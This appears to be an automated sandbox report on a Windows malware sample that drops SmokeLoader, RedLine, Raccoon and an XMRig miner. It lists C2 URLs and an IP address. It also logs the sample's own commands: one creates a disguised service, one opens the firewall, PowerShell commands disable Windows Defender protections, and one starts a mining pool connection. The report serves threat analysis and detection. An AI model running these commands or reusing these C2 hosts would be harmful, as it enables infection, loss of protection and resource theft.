Analysis
-
max time kernel
54s -
max time network
154s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
07-09-2021 03:37
Static task
static1
Behavioral task
behavioral1
Sample
d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe
Resource
win10v20210408
General
-
Target
d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe
-
Size
247KB
-
MD5
f08646a1b6ac75296bcb92ae031b9261
-
SHA1
f4adfe3f9031d6d59943132a4eeb053ed0358e53
-
SHA256
d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a
-
SHA512
084559287185500bc39e9d2f19cc76eb3b6467af0db90b9c5ec8255a33305a125699916f3ef9ed13e20b0967e4bfa71375aea810f838c5acf031451f656eca3c
Malware Config
Extracted
smokeloader
2020
http://fazanaharahe1.xyz/
http://xandelissane2.xyz/
http://ustiassosale3.xyz/
http://cytheriata4.xyz/
http://ggiergionard5.xyz/
http://rrelleynaniy6.store/
http://danniemusoa7.store/
http://nastanizab8.store/
http://onyokandis9.store/
http://dmunaavank10.store/
http://gilmandros11.site/
http://cusanthana12.site/
http://willietjeana13.site/
http://ximusokall14.site/
http://blodinetisha15.site/
http://urydiahadyss16.club/
http://glasamaddama17.club/
http://marlingarly18.club/
http://alluvianna19.club/
http://xandirkaniel20.club/
Extracted
redline
newnew
185.167.97.37:30904
Extracted
raccoon
e89524de1a131be43c3cc9ec324dabb6a9998c12
-
url4cnc
https://telete.in/httpnotdetect1
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\2227.exe disable_win_def C:\Users\Admin\AppData\Local\Temp\2227.exe disable_win_def -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\D160.exe family_redline C:\Users\Admin\AppData\Local\Temp\D160.exe family_redline behavioral1/memory/4496-184-0x00000000051B0000-0x00000000057B6000-memory.dmp family_redline behavioral1/memory/4308-285-0x0000000004170000-0x00000000041C8000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4360 created 1436 4360 WerFault.exe E43F.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\xmrig.exe xmrig C:\Users\Admin\AppData\Roaming\xmrig.exe xmrig -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
Processes:
CAF7.exeCAF7.exeD160.exeD856.exeDEFF.exeE43F.exeFCF8.exepbwtazzn.exe17C5.exe1D25.exe2227.exe2D05.exepid process 3856 CAF7.exe 3264 CAF7.exe 2660 D160.exe 504 D856.exe 1068 DEFF.exe 1436 E43F.exe 4496 FCF8.exe 4536 pbwtazzn.exe 5016 17C5.exe 2224 1D25.exe 3428 2227.exe 4308 2D05.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
D856.exeFCF8.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion D856.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion D856.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FCF8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FCF8.exe -
Deletes itself 1 IoCs
Processes:
pid process 3048 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\D856.exe themida C:\Users\Admin\AppData\Local\Temp\D856.exe themida behavioral1/memory/504-138-0x0000000000110000-0x0000000000111000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\FCF8.exe themida C:\Users\Admin\AppData\Local\Temp\FCF8.exe themida behavioral1/memory/4496-172-0x0000000000B70000-0x0000000000B71000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\17C5.exe themida C:\Users\Admin\AppData\Local\Temp\17C5.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Processes:
D856.exeFCF8.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D856.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FCF8.exe -
Drops file in System32 directory 1 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
D856.exeFCF8.exepid process 504 D856.exe 4496 FCF8.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exeCAF7.exepbwtazzn.exedescription pid process target process PID 4648 set thread context of 1540 4648 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe PID 3856 set thread context of 3264 3856 CAF7.exe CAF7.exe PID 4536 set thread context of 4324 4536 pbwtazzn.exe svchost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2200 1436 WerFault.exe E43F.exe 3200 1436 WerFault.exe E43F.exe 3852 1436 WerFault.exe E43F.exe 3208 1436 WerFault.exe E43F.exe 4360 1436 WerFault.exe E43F.exe 756 4308 WerFault.exe 2D05.exe 3032 4308 WerFault.exe 2D05.exe 2436 4308 WerFault.exe 2D05.exe 5028 4308 WerFault.exe 2D05.exe 1688 4308 WerFault.exe 2D05.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
CAF7.exed4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI CAF7.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI CAF7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI CAF7.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Control Panel\Buses svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 242bd73f1d11240424edb47d450dd49d084297dce82e72baa46d34fdc48d541dec81c2fc81cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d9834b7634e4ac644490bdb57926ec9d5a0ccafdb954758df21d5904e0a56c15da834e763de5af64419bdce0286682cd0934cbc4e4241dd69f460a33ffa26e10edc70f3252a0f40948f490b57924ea935a04c5f5be54718bce15515bb9fd3041ed85487439e3ab5614c48884a93489a674e84d9d8d541de4ac743d04bafb2f4fb2c70f320dd49d642df4bd848570864d2834fdc48d57d1f6ae743d04cca56417c3814b6a3ce0ab4a1ccc85844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743d04cd765c24ed svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exepid process 1540 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe 1540 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3048 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exeCAF7.exepid process 1540 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe 3264 CAF7.exe -
Suspicious use of AdjustPrivilegeToken 55 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeD160.exeD856.exeFCF8.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeRestorePrivilege 2200 WerFault.exe Token: SeBackupPrivilege 2200 WerFault.exe Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeDebugPrivilege 2200 WerFault.exe Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeDebugPrivilege 3200 WerFault.exe Token: SeDebugPrivilege 3852 WerFault.exe Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeDebugPrivilege 3208 WerFault.exe Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeDebugPrivilege 4360 WerFault.exe Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeDebugPrivilege 2660 D160.exe Token: SeDebugPrivilege 504 D856.exe Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeDebugPrivilege 4496 FCF8.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeDebugPrivilege 4820 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exeCAF7.exeDEFF.exepbwtazzn.exe1D25.exedescription pid process target process PID 4648 wrote to memory of 1540 4648 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe PID 4648 wrote to memory of 1540 4648 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe PID 4648 wrote to memory of 1540 4648 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe PID 4648 wrote to memory of 1540 4648 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe PID 4648 wrote to memory of 1540 4648 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe PID 4648 wrote to memory of 1540 4648 d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe PID 3048 wrote to memory of 3856 3048 CAF7.exe PID 3048 wrote to memory of 3856 3048 CAF7.exe PID 3048 wrote to memory of 3856 3048 CAF7.exe PID 3856 wrote to memory of 3264 3856 CAF7.exe CAF7.exe PID 3856 wrote to memory of 3264 3856 CAF7.exe CAF7.exe PID 3856 wrote to memory of 3264 3856 CAF7.exe CAF7.exe PID 3856 wrote to memory of 3264 3856 CAF7.exe CAF7.exe PID 3856 wrote to memory of 3264 3856 CAF7.exe CAF7.exe PID 3856 wrote to memory of 3264 3856 CAF7.exe CAF7.exe PID 3048 wrote to memory of 2660 3048 D160.exe PID 3048 wrote to memory of 2660 3048 D160.exe PID 3048 wrote to memory of 2660 3048 D160.exe PID 3048 wrote to memory of 504 3048 D856.exe PID 3048 wrote to memory of 504 3048 D856.exe PID 3048 wrote to memory of 504 3048 D856.exe PID 3048 wrote to memory of 1068 3048 DEFF.exe PID 3048 wrote to memory of 1068 3048 DEFF.exe PID 3048 wrote to memory of 1068 3048 DEFF.exe PID 3048 wrote to memory of 1436 3048 E43F.exe PID 3048 wrote to memory of 1436 3048 E43F.exe PID 3048 wrote to memory of 1436 3048 E43F.exe PID 1068 wrote to memory of 2516 1068 DEFF.exe cmd.exe PID 1068 wrote to memory of 2516 1068 DEFF.exe cmd.exe PID 1068 wrote to memory of 2516 1068 DEFF.exe cmd.exe PID 1068 wrote to memory of 2724 1068 DEFF.exe cmd.exe PID 1068 wrote to memory of 2724 1068 DEFF.exe cmd.exe PID 1068 wrote to memory of 2724 1068 DEFF.exe cmd.exe PID 1068 wrote to memory of 4304 1068 DEFF.exe sc.exe PID 1068 wrote to memory of 4304 1068 DEFF.exe sc.exe PID 1068 wrote to memory of 4304 1068 DEFF.exe sc.exe PID 1068 wrote to memory of 3996 1068 DEFF.exe sc.exe PID 1068 wrote to memory of 3996 1068 DEFF.exe sc.exe PID 1068 wrote to memory of 3996 1068 DEFF.exe sc.exe PID 1068 wrote to memory of 4416 1068 DEFF.exe sc.exe PID 1068 wrote to memory of 4416 1068 DEFF.exe sc.exe PID 1068 wrote to memory of 4416 1068 DEFF.exe sc.exe PID 3048 wrote to memory of 4496 3048 FCF8.exe PID 3048 wrote to memory of 4496 3048 FCF8.exe PID 3048 wrote to memory of 4496 3048 FCF8.exe PID 1068 wrote to memory of 2648 1068 DEFF.exe netsh.exe PID 1068 wrote to memory of 2648 1068 DEFF.exe netsh.exe PID 1068 wrote to memory of 2648 1068 DEFF.exe netsh.exe PID 4536 wrote to memory of 4324 4536 pbwtazzn.exe svchost.exe PID 4536 wrote to memory of 4324 4536 pbwtazzn.exe svchost.exe PID 4536 wrote to memory of 4324 4536 pbwtazzn.exe svchost.exe PID 4536 wrote to memory of 4324 4536 pbwtazzn.exe svchost.exe PID 4536 wrote to memory of 4324 4536 pbwtazzn.exe svchost.exe PID 3048 wrote to memory of 5016 3048 17C5.exe PID 3048 wrote to memory of 5016 3048 17C5.exe PID 3048 wrote to memory of 5016 3048 17C5.exe PID 3048 wrote to memory of 2224 3048 1D25.exe PID 3048 wrote to memory of 2224 3048 1D25.exe PID 3048 wrote to memory of 3428 3048 2227.exe PID 3048 wrote to memory of 3428 3048 2227.exe PID 2224 wrote to memory of 4848 2224 1D25.exe powershell.exe PID 2224 wrote to memory of 4848 2224 1D25.exe powershell.exe PID 2224 wrote to memory of 4844 2224 1D25.exe powershell.exe PID 2224 wrote to memory of 4844 2224 1D25.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe"C:\Users\Admin\AppData\Local\Temp\d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe"C:\Users\Admin\AppData\Local\Temp\d4f4b9420a15240c61f1609dc21fec3584b4863c1d98a66b7db7ebf88888d44a.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\CAF7.exeC:\Users\Admin\AppData\Local\Temp\CAF7.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\CAF7.exeC:\Users\Admin\AppData\Local\Temp\CAF7.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\D160.exeC:\Users\Admin\AppData\Local\Temp\D160.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D856.exeC:\Users\Admin\AppData\Local\Temp\D856.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\DEFF.exeC:\Users\Admin\AppData\Local\Temp\DEFF.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\fdotwtsz\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pbwtazzn.exe" C:\Windows\SysWOW64\fdotwtsz\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create fdotwtsz binPath= "C:\Windows\SysWOW64\fdotwtsz\pbwtazzn.exe /d\"C:\Users\Admin\AppData\Local\Temp\DEFF.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description fdotwtsz "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start fdotwtsz2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Users\Admin\AppData\Local\Temp\E43F.exeC:\Users\Admin\AppData\Local\Temp\E43F.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 7202⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 8442⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 8802⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 8522⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\FCF8.exeC:\Users\Admin\AppData\Local\Temp\FCF8.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\fdotwtsz\pbwtazzn.exeC:\Windows\SysWOW64\fdotwtsz\pbwtazzn.exe /d"C:\Users\Admin\AppData\Local\Temp\DEFF.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\17C5.exeC:\Users\Admin\AppData\Local\Temp\17C5.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1D25.exeC:\Users\Admin\AppData\Local\Temp\1D25.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName facebook.com2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName outlook.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName bing.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com2⤵
-
C:\Users\Admin\AppData\Local\Temp\2227.exeC:\Users\Admin\AppData\Local\Temp\2227.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell Add-MpPreference -ExclusionExtension .exe -Force2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionExtension .exe -Force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
-
C:\Users\Admin\AppData\Roaming\xmrig.exe"C:\Users\Admin\AppData\Roaming\xmrig.exe" --cinit-find-x -B --log-file=WWMKLMIEPOOLOMDT7XVTWO4PZQ865E81YNUHF62KQWE8CL.txt --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=46N5zSuWXZxEL9R15g1BxDKTjKxqYJghY6BoGAF6TxkqJrpxeqyfWAqjawsQgUT3tx8PyTuZRdiL6CCAY5QAJqi9JGa6Rr9 --pass=XMR Miner --cpu-max-threads-hint=50 --cinit-stealth-targets="Wi4AbZOHTuCRnu5j9xZIAA==" --cinit-idle-wait=10 --cinit-idle-cpu=90 --cinit-stealth2⤵
-
C:\Users\Admin\AppData\Local\Temp\2D05.exeC:\Users\Admin\AppData\Local\Temp\2D05.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 7122⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 6802⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 7802⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 8522⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 8922⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\35B1.exeC:\Users\Admin\AppData\Local\Temp\35B1.exe1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com2⤵
-
C:\Users\Admin\AppData\Local\Temp\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\RegAsm.exe2⤵
-
C:\Users\Admin\AppData\Roaming\UVKFWNIBNQ.exe"C:\Users\Admin\AppData\Roaming\UVKFWNIBNQ.exe"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process | measure VirtualMemorySize -Sum4⤵
-
C:\Users\Admin\AppData\Local\Temp\63B7.exeC:\Users\Admin\AppData\Local\Temp\63B7.exe1⤵
Network
